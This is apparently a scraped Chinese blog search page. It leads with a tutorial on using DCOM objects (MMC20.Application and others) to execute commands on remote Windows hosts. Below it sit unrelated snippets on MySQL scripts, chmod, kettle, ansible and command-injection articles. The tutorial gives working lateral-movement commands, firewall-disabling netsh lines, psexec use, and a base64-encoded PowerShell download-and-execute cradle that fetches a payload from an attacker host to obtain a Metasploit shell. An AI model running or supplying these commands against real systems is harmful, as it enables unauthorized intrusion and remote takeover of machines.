精华内容
下载资源
问答
  • 利用DCOM实现远程命令执行

    万次阅读 2020-11-17 11:53:22
    实现命令执行的方式之前我写过文章来总结,前两天又发现了一个新方法DCOM,于是有了这篇文章。 2.实现过程 2.1通过DCOM在本机执行命令 实现条件: 管理员权限的powershell 查找DCOM组件MMC Application Class如下图...

    1.前言

    实现命令执行的方式之前我写过文章来总结,前两天又发现了一个新方法DCOM,于是有了这篇文章。

    2.实现过程

    2.1通过DCOM在本机执行命令

    实现条件:

    1. 管理员权限的powershell
    2. 查找DCOM组件MMC Application Class如下图,命令为
    Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication |Where-Object{$_.Name -like "MM*"}
    

    在这里插入图片描述

    命令:

    $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1"))
    $com.Document.ActiveView.ExecuteShellCommand
    $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")
    

    ExecuteShellCommand对应的参数具体含义可参考以下链接:
    https://msdn.microsoft.com/en-us/library/aa815396(v=vs.85).aspx

    在这里插入图片描述

    2.2通过DCOM控制远程主机执行命令

    实现条件:

    1. 管理员权限的powershell
    2. 客户端关闭防火墙
    3. 服务端需要域管的administrator账户或者目标主机具有管理员权限的账户
    4. 双方主机都需有MMC Application Class这个DCOM组件。
      命令:
    net use \\192.168.124.3 "123" /u:"test\administrator"
    netsh -r 192.168.124.3 -u TEST\administrator -p 123 advfirewall set currentprofile firewallpolicy allowinbound,allowoutbound
    #远程关闭防火墙不过一般会失败,默认不会开启远程管理防火墙的这个权限。
    $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.124.3"))
    $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")
    
    # 有可能弹不出计算器,但是可以将命令改为:
    $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c shutdown -r -t 1","Minimized")
    发现远程主机会重启。
    

    如果上述命令执行失败,很有可能是防火墙开启造成的,这时候我们可以通过impacket来获取远程主机的shell然后再进行防火墙的配置。

    psexec.exe test/lisi:123@192.168.124.3
    netsh advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow
    netsh advfirewall set currentprofile state off
    netsh advfirewall set allprofiles state off
    netsh advfirewall set currentprofile settings remotemanagement enable
    

    第二种命令:

    $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.124.3")
    $obj = [System.Activator]::CreateInstance($com)
    $item = $obj.item()
    $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)
    
    #测试成功,不需要对方主机的凭据,只需要当前主机的管理员权限即可。
    

    第三种命令:

    $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"192.168.124.3")
    $obj = [System.Activator]::CreateInstance($com)
    $obj.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)
    
    #测试成功,不需要对方主机的凭据,只需要当前主机的管理员权限即可。
    

    2.3补充:

    在192.168.124.2上执行命令,不需要执行net use命令:

    
    $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.124.3"))
    
    $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c powershell -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABjAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGMALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMgA0AC4AMQA6ADgAMAA4ADAALwBoAHgASAByAHMASABXAEYASABKADkALwBEAFEAMABKAHMAZABxAFIAUAAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMgA0AC4AMQA6ADgAMAA4ADAALwBoAHgASAByAHMASABXAEYASABKADkAJwApACkAOwA=","Minimized")
    
    

    在msf上监听,可以得到一个shell,这个shell是192.168.124.3的,登陆shell的用户为192.168.124.2的用户(我是在域环境测试的)。
    192.168.124.2的大概环境:
    在这里插入图片描述
    msf上得到的shell:
    在这里插入图片描述

    如果在执行这些命令之前执行了net use命令,获得了一个有权限的IPC管道(例如使用域控的凭据连接目标主机),得到的结果也是一样的,也就是说net use命令存在与否并不影响结果。

    3.参考文章

    域渗透-利用DCOM在远程系统执行程序

    4.防御方式

    开启域防火墙

    展开全文
  • sql脚本是包含一到多个sql命令的sql语句,我们可以将这些sql脚本放在一个文本文件中(我们称之为“sql脚本文件”),然后通过相关的命令执行这个sql脚本文件。基本步骤如下:1、创建包含sql命令的sql脚本文件文件中...

    前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到教程。

    sql脚本是包含一到多个sql命令的sql语句,我们可以将这些sql脚本放在一个文本文件中(我们称之为“sql脚本文件”),然后通过相关的命令执行这个sql脚本文件。基本步骤如下:
    1、创建包含sql命令的sql脚本文件
    文件中包含一些列的sql语句,每条语句最后以;结尾,文件内容示例如下:
    --创建表,使用“--”进行注释
    create table 表名称
    (                   
      Guid Varchar(38) not null primary key,  
      Title Varchar(255),       
                  
    ) TYPE=InnoDB;

    --在表A中增加字段Status
    alter table A add Status TinyInt default '0';

    --在表A上创建索引
    create index XX_TaskId_1 on A(Id_);
    --在A表中添加一条记录
    Insert into A (Id,ParentId, Name) values(1,0,'名称');
    --添加、修改、删除数据后,有可能需要提交事务
    Commit;

    2、执行sql脚本文件
    方法一 
    使用cmd命令执行(windows下,unix或linux在的其控制台下)
    【Mysql的bin目录】\mysql –u用户名 –p密码 –D数据库<【sql脚本文件路径全名】,示例:
    D:\mysql\bin\mysql –uroot –p123456 -Dtest<d:\test\ss.sql
    注意:
    A、如果在sql脚本文件中使用了use 数据库,则-D数据库选项可以忽略
    B、如果【Mysql的bin目录】中包含空格,则需要使用“”包含,如:“C:\Program Files\mysql\bin\mysql” –u用户名 –p密码 –D数据库<【sql脚本文件路径全名】

    方法二 进入mysql的控制台后,使用source命令执行
    Mysql>source 【sql脚本文件的路径全名】 或 Mysql>\. 【sql脚本文件的路径全名】,示例:

    source d:\test\ss.sql 或者 \. d:\test\ss.sql

     

    展开全文
  • Linux 如何赋予命令执行权限

    万次阅读 2016-09-24 16:17:51
    Linux如何赋予命令执行权限 命令: chmod +x *.sh 1. 命令之前: 执行命令之后:

                              Linux 如何赋予命令执行权限

     

    命令:

     chmod  +x   *.sh

    1.

    命令之前:

    执行命令之后:

     

    chmod 说明

    -rw------- (600)    只有拥有者有读写权限。
    -rw-r--r-- (644)    只有拥有者有读写权限;而属组用户和其他用户只有读权限。
    -rwx------ (700)    只有拥有者有读、写、执行权限。
    -rwxr-xr-x (755)    拥有者有读、写、执行权限;而属组用户和其他用户只有读、执行权限。
    -rwx--x--x (711)    拥有者有读、写、执行权限;而属组用户和其他用户只有执行权限。
    -rw-rw-rw- (666)    所有用户都有文件读、写权限。
    -rwxrwxrwx (777)    所有用户都有读、写、执行权限。

     

    展开全文
  • MySQL通过source命令执行sql文件

    万次阅读 2018-02-26 10:42:58
    见百度:https://jingyan.baidu.com/article/e75057f2e284ceebc91a891b.htmlIT人员经常会和MySQL打交道,备份和恢复...来介绍如何在命令行中执行sql文件打开cmd窗口,根据MySQL安装目录,在cmd命令下输入如下命令...

    前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到教程。

    IT人员经常会和MySQL打交道,备份和恢复应该是最常用的操作了,那么通过直接执行sql文件无疑是最快捷的方式,本文通过转储sql文件,并在新数据库中执行sql文件,来介绍如何在命令行中执行sql文件

    打开cmd窗口,

    根据MySQL安装目录,在cmd命令下输入如下命令:

    d:/mysql/bin/mysql -h localhost -u root -p

    注:此处的d:/mysql/bin/mysql调整为具体安装目录,此处的localhost如果是远程连接,需要改为具体IP地址。

     

    输入正确的密码后回车即可成功登录。

     

    此时,选定数据库: use ymt_new (ymt_new 是数据库名

        并执行source d:/ymt.sql  ( d:/ymt.sql 是sql所在的路径 ) 命令。

     

    待所有命令执行完毕时,在 Navicat 中打开 ymt_new 数据库,可以看到,所有的表都已经创建好了。

     

    展开全文
  • 命令执行基础知识

    千次阅读 2018-10-06 19:30:58
    命令执行含义   当应用需要调用一些外部程序去处理内容情况下,就会用到一些执行系统命令的函数,比如php中的system、exec、shell_exec、passthru、popen、popc_popen等,当用户调用这些函数时,将恶意系统命令...
  • 命令输入方式有两种 1.直接键入命令(可能存在歧义,机器会按照一定的优先级判断命令的...单纯键入命令时由于有歧义,所以存在着命令执行的优先级问题 命令执行的优先级: 别名(alias)>内部命令>外部命令:hash  
  • 命令执行 命令出错 每条规则中的命令和操作系统Shell的命令行是一致的。make会一按顺序一条一条的执行命令,每条命令的开头必须以[Tab]键开头,除非,命令是紧跟在依赖规则后面的分号后的。在命令行之间中的空格...
  • kettle后台命令执行任务

    千次阅读 2020-05-06 16:35:14
    kettle后台命令执行任务kitchenPan配置定时任务 kitchen kitchen是一个作业执行引擎,用来执行作业。这是一个命令行执行工具, 参数说明如下 -rep:Repository name 任务包所在存储名 -user:Repository username ...
  • 命令执行漏洞介绍及利用

    千次阅读 2020-06-12 14:02:53
    命令执行漏洞原理 web应用程序接受用户输入,拼接到要执行的系统命令中执行 产生原理: 1.用户输入未过滤或净化 2.拼接到系统命令中执行
  • 命令执行漏洞及防御

    千次阅读 2018-10-22 20:20:35
    命令执行: PHP:system、exec、shell_exec、passthru、popen、proc_popen等称为高危漏洞。 原理:只要程序可以调用系统命令的情况下都可以发生命令执行漏洞。 条件:用户能够控制函数输入,存在可以执行代码的...
  • 使用find 命令执行命令 -exec

    千次阅读 2018-07-27 12:17:05
    如果-exec执行的过程中,执行的命令执行异常,后面的文件还会继续执行吗? 答案是会 做一个简单的实验证明之:、 首先文件夹下内容 root@e2e1e45edb7a:~/test# ls -l 总用量 104 -rw-r--r-- 1 root root 15 7月 ...
  • ansible命令执行模块使用

    万次阅读 2016-01-21 10:49:57
    ansible命令执行模块使用 1、命令执行模块-command 在远程节点上运行命令。 命令模块使用命令名称,接上空格-的分割符作为参数使用,但是不支持管道符和变量等,如果要使用这些,那么可以使用shell模块。 ...
  • Web安全之命令执行漏洞

    千次阅读 2019-07-09 20:14:44
    命令执行漏洞的概述 命令执行漏洞的危害 命令执行漏洞的利用 命令执行漏洞的防御 背景介绍 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一些问题。比如说速度慢...
  • 远程命令执行漏洞的原理 远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端 没有针对执行函数做 过滤,导致在没有指定绝对路径的情况下就执行命令 复现示例 Tomcat任意文件上传漏洞CVE-2017-12615...
  • shell命令执行结果$?

    千次阅读 2019-09-29 10:42:52
    shell命令执行结果
  • CTF命令执行及绕过技巧

    万次阅读 2019-03-07 16:18:21
    文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们...
  • linux shell 命令执行超时终止

    千次阅读 2020-02-19 14:10:25
    shell下控制命令执行超时自动终止 持续执行的任务 & { sleep 超时时间; kill $! & } 例如: ping 命令执行10秒后 终止 ping 192.168.1.1 & { sleep 10; kill $! & } ...
  • 使用java命令执行class文件

    千次阅读 2019-01-08 11:42:55
    使用java命令执行class文件
  • 1、在用python执行sqlmap批量扫描时,文件名带中文,os.popen命令执行失败。 ``` def Cmd_Sqlmap(self,path,b="疑似存在注入汇总.txt"): filename = os.path.join(path,b) os.chdir("E:\Python27\sqlmap") ...
  • 用友NC远程命令执行漏洞通告

    千次阅读 2020-06-04 22:59:32
    用友NC远程命令执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月04日, 360CERT监测发现国内安全组织发布了用友NC远程命令执行漏洞的风险通告,漏洞等级:高危。 用友NC...
  • Struts2远程命令执行漏洞

    万次阅读 2017-12-20 16:09:51
    Struts2 远程命令执行漏洞
  • Oracle_使用bat命令执行sql命令文件

    千次阅读 2015-01-21 15:34:48
    使用bat命令执行sql命令文件
  • Flutter命令执行得不到结果

    千次阅读 2019-05-12 20:51:47
    packages get 命令执行得不到结果 在添加依赖包后,执行packages get后卡住了 packages get Running "flutter packages get" in flutter_app... 出现这种情况后,再执行其他命令都失败,比如执行flutter precache,...
  • DVWA之Command injection(命令执行漏洞)

    千次阅读 2018-10-01 17:45:07
    命令执行漏洞的原理:在操作系统中, &amp; 、&amp;&amp; 、| 、 || 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下...
  • 命令执行和代码执行漏洞

    千次阅读 2018-12-06 22:19:15
    代码执行漏洞也叫代码注入漏洞,指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行...
  • linux系统基本命令之虚拟机控制,命令执行,快捷键
  • 用dos命令执行jar文件

    千次阅读 2017-04-09 14:17:19
    用dos命令执行jar文件
  • 我的shell脚本里面有一条去其他服务器上pull代码的命令,但是因为各种原因可能pull不到 我怎么才能让这条命令执行了几分钟之后还没有执行完的话就exit退出整个脚本呢?
  • ping命令执行过程详解

    千次阅读 2015-09-19 18:38:32
    ping命令执行过程详解 ping命令执行过程详解  “ping”是我们经常会接触到的命令,但是大家对这个命令的了解有多少,这个命令的执行过程以及返回过来的信息代表什么意思呢?接下来我为大家逐一讲解。 ...
  • ctf-ping命令执行绕过

    千次阅读 2019-09-25 03:15:51
    命令执行绕过,试了试过滤了一些:一些命令 但是反引号可以执行命令 通过拼接,可以拼接出来:ls 命令 127.0.0.1;`a="l";b="s";c=$a$b;$c` 可以发现 flag就是下面那一串flag_ 开头的字符串 在...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 360,324
精华内容 144,129
关键字:

命令执行